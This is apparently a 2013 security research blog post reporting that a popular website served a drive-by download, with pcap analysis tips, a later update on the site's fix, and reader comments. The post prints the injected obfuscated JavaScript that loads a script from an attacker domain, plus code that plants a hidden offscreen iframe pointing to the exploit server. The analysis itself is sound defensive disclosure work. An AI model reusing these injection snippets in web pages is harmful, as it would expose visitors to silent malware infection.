Yesterday on, Malware

Druckfreundlich, PDF & E-Mail

On 2013-11-10 one of our research systems discovered that the website was hosting a drive-by-download that resulted in malware being installed on vulnerable systems that visited the website. As with the compromise that we posted about a few weeks ago, sites that are very popular serving malware can quickly compromise a large number on users. According to Alexa comes in at 650th most popular site in the world, and 289th in the US, meaning thousands of visitors were exposed.

The exploit was served via malicious javascript on

var tyi = “cdm.”; var itwo = “cracked”; var itto = “/”; var phw = “php”; var jfw = “src”; var fscr = “script”; var twi = “i”; var htp = “http”; var vol54 = “src”;document.write(“<“+fscr+” “+jfw+”=”+htp+”:”+itto+””+itto+””+twi+”.”+itwo+””+tyi+”com”+itto+””+twi+”.”+phw+”><“+itto+””+fscr+”>”);

Which sends a request to, a domain registered on 2013-11-04, which means we can assume that those responsible for this had the ability to serve their content from at least that early.

From there an iframe is inserted pointing to

var urla='';var divTag=document.createElement(‘div');'ad3′;document.body.appendChild(divTag);var fr3=document.createElement(‘iframe');fr3.width='88px';fr3.height='31px';fr3.setAttribute(‘style','position: absolute;left: -8000px;top: 0px;overflow-x: hidden;overflow-y: hidden;');fr3.setAttribute(‘src',urla);document.getElementById(‘ad3').appendChild(fr3);

From there a blend of malicious pdf, java and html/javascript files are sent to the browser and upon success the malware itself is downloaded and installed on the compromised system leaving the user little indication that their system has been compromised except that the java plugin has launched and the system is low on memory.

As of the time of this post the malware is detected by 7 out of the 46 antivirus engines tested by

Further details of the behavior of the malware itself can be seen at

Here is a link to the full pcap (50c691bad0ba43d4370e2be0dd873e83, 4.3M)  for your own further analysis/study. It seems that intentionally or otherwise the attackers employed some techniques to make packet analysis a bit more difficult than usual so be prepared to go a bit beyond your standard methodology.

We attempted to contact with this information, but unfortunately they provide no security contact information on their website, their [email protected] bounces, and so far they have not responded to messages to their twitter account. So if you know anyone involved in running that site they might appreciate you sharing this post with them.


A few more details about the pcap since we've had some questions.

Frame number 66 is the response from (after a redirect). You can see the malicious JS inserted along with their twitter feed, line 1645 if you extract the text response, or search for “paddingLeftFooter twitterLogo” and you'll find it.

The request to /i.php on begins in frame 1251.

The exploits and the payload are delivered from in multiple requests begining at 1495, 2565, 2567, 2581, and several others. If you're exploring the easiest way to see this part is to use the ‘http contains “”‘ as your Wireshark filter.

Happy analyzing.

Update 2013-11-14:

One of the site administrators (David Wong) of has posted to their forums that the team fixed the problem Tuesday afternoon. hxxp://

It seems as though the site being compromised and serving malware has been a reoccurring problem with Each with somewhat lax approach “Yeah we stopped getting complaints about it and Google took us off the malware warning list or whatever was triggering it. Is anybody else getting it again?” on their forums. This combined with not alerting their site visitors that know what has happened and remediation steps that they can take to cleanup their systems tends to indicate that should be avoided if you're concerned with malware.

4 Kommentare

  1. PavleNovember 13, 2013

    As a frequent user of, I’m reasonably worried by this. How would one go about containing and eliminating it, if their machine had been infected?

  2. KrisNovember 14, 2013

    i think making a list of the 7 ways i feel most betrayed is in order.

  3. Mike BirchwoodNovember 14, 2013

    I’ll just toss out all my JS webshells then, clearly they aren’t malicious anymore.

    JavaScript has many unsafe functions, and malicious iframes are not “just annoying”, they are responsible for a ridiculous amount of drive-by downloads and theft of credentials and personal information.

    A simple search for “malicious javascript” brings a wealth of information, but here’s the top hit:

    I can’t REMEMBER the last time I saw a browser-based exploit in the wild that didn’t leverage JavaScript in some way. JS not only can be used to do sketchy shit, but in general, we can READ what’s happening with JavaScript because it runs in our client, not the server, that lets us mess with your code and perform all sorts of lovely little attacks.

    Source: CyberWarrior fighting the APT with the Big Data in The Cloud

  4. ZedbenNovember 14, 2013

    JavaScript isn’t as safe as you say. I understand the frustration with getting it confused with Java, but as you can see from the article it was used to cause the download of the file that caused this. Not only can it cause annoying popups, but it can also open hidden iframes to malicious URLs (among other things).

    It can be used to do a ton of stuff that the normal user would never know about. So, disabling JavaScript is not necessarily a bad idea. I have it disabled by default for sites I have never been to.

    There are many other tools out there you can use to make your site user-friendly like HTML5 and CSS3 😉

Die Kommentare sind geschlossen.

Nach oben scrollen